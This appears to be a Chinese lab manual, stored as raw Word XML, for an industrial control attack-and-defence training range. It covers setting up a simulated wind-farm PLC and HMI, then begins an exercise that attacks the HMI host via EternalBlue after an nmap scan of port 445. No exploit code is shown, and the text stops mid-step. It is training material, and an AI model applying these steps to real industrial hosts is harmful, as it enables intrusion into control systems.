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65D6DF">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Win7虚拟平台，安装了施耐德  Unity Pro XL软件，为施耐德M580虚拟PLC环境。对于下位机，需要手动登录进入将PLC开启运行：打开PLC工程项目-&gt;下载程序到PLC中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13E361">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="lef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场景配置</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="466FC654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本场景由风力发电控制系统的上下位机构建而成，网络拓扑结构如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A85BD">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9197B2">
      <w:p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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.0/147/</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6112510" cy="2857500"/>
            <wp:effectExtent l="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67C7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风力发电下位机:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>虚拟平台，安装了西门子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SIMTIAC M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> V5.4.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>软件，为西门子s7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>虚拟P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>环境。获取下位机外网I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>地址如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71768140">
      <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6117590" cy="3491865"/>
            <wp:effectExtent l="0" t="0" r="165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CEE5">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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对于下位机，需要手动登录进入将P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>开启运行：打开P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>工程项目-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>下载程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4097F1">
      <w:p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到P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中-&gt;运行P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A568C"/>
    <w:p w14:paraId="41AAA555"/>
    <w:p w14:paraId="0CA5883B">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9D6755">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D40A08">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5766435" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="5715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7680" cy="14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4CCA">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F3C81F">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5835015" cy="1322070"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1143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179" cy="13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3841">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F0C2DA">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5848350" cy="26384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EEC9">
      <w:p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至此，下位机配置完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC2596">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A09D45A">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7910226E">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47059995">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02461340">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7658138B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风力发电上位机:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>虚拟平台，安装了组态王6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>软件。需要进入后启动运行上位机软件并做相对应配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AB063">
      <w:pPr>
        <w:pStyle w:val="21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由于每次实验可能虚拟plc的ip地址在变化，所以需要在组态王软件中修改PLC的IP地址。在上位机桌面中点击</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="534035" cy="4718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52" cy="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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>快捷方式，打开工程管理器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C9D7D">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="1397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017">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16049840">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41FEA7B2">
      <w:pPr>
        <w:pStyle w:val="21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选中“设备C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OM3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”，再鼠标双击右侧的新I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>设备图标，点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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</w:rPr>
        <w:t>一直下一步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，将PLC的IP修改为此次实验的PLC IP地址，默认完成退出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C6B9B">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FC61E0">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0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6120130" cy="286321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D5E">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一直下一步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A6C8E0">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6092190" cy="2975610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548" cy="298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7CD1">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F6B5EC">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="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点击菜单栏V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>切换自动运行：通讯指示灯为绿色，表示通讯正常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C76FA">
      <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6085840" cy="2220595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8008" cy="22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0012">
      <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="280098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21" cy="28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498">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DACB448">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="lef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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E9CB0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工业网络攻防实训平台基于云计算理念，以虚拟化技术为核心，结合复杂工业网络攻防技术，提供面向多人的工业网络攻防训练环境。平台由以下几个层次组成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B0F33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基础支撑层实现了硬件资源，包括服务器资源、存储资源和网络资源的虚拟化处理，以实现上层应用对设备硬件资源及虚拟化的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872A2A7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平台层负责各类应用数据和支撑数据的接入，并实现数据库、知识库、标准服务的统一化，提供上层应用所需的基础数据和业务数据管理服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F491957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业务层提供上层应用所需的各类支撑处理模块，包括教学考核、竞赛靶场、演练靶场、工控靶场，以实现上层应用的快速部署和可扩展性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B9AED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应用层提供用户具体的应用业务逻辑和人机交互界面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46182246">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="lef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场景工艺介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416DA572">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="560" w:firstLineChars="20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 采用西门子S7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PLC控制系统，PLC为西门子S7-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>400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PLC仿真器，操作员站监控系统采用组态王组态，两者之间采用s7协议通讯，风力发电场景模拟风力发电系统运行模式以及各数据等进行监控、控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0E659">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6120130" cy="26479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7401" cy="265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3766">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACFF0A5">
      <w:p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实验内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF0A2C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"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/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验一 风力发电上位机攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，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获取上位机登录权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D56474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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AEBBD2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SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2002EC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 w14:paraId="32DB48CE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恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E210D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在工业生产大区的网络中，由于生产的连续性以及工业软件的兼容性要求，操作系统补丁更新比较滞后或者受阻，所以永恒之蓝漏洞在生产大区的网络还是大量存在，通过本实验了解的永恒之蓝漏洞危害，对工业控制系统的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA57B5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实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C0729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本实验所需环境如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFA03B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靶机操作系统为Windows 7 64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E049781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攻击机kali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</w:p>
    <w:p w14:paraId="4922EC87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79E99E20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66B0C126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</w:p>
    <w:p w14:paraId="218B7FF5">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA1F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto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在场景中登录攻击机，使用nmap对IP进行端口扫描：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E2D4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6115685" cy="3391535"/>
            <wp:effectExtent l="0" t="0" r="1841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2558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扫描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发现开放445，尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
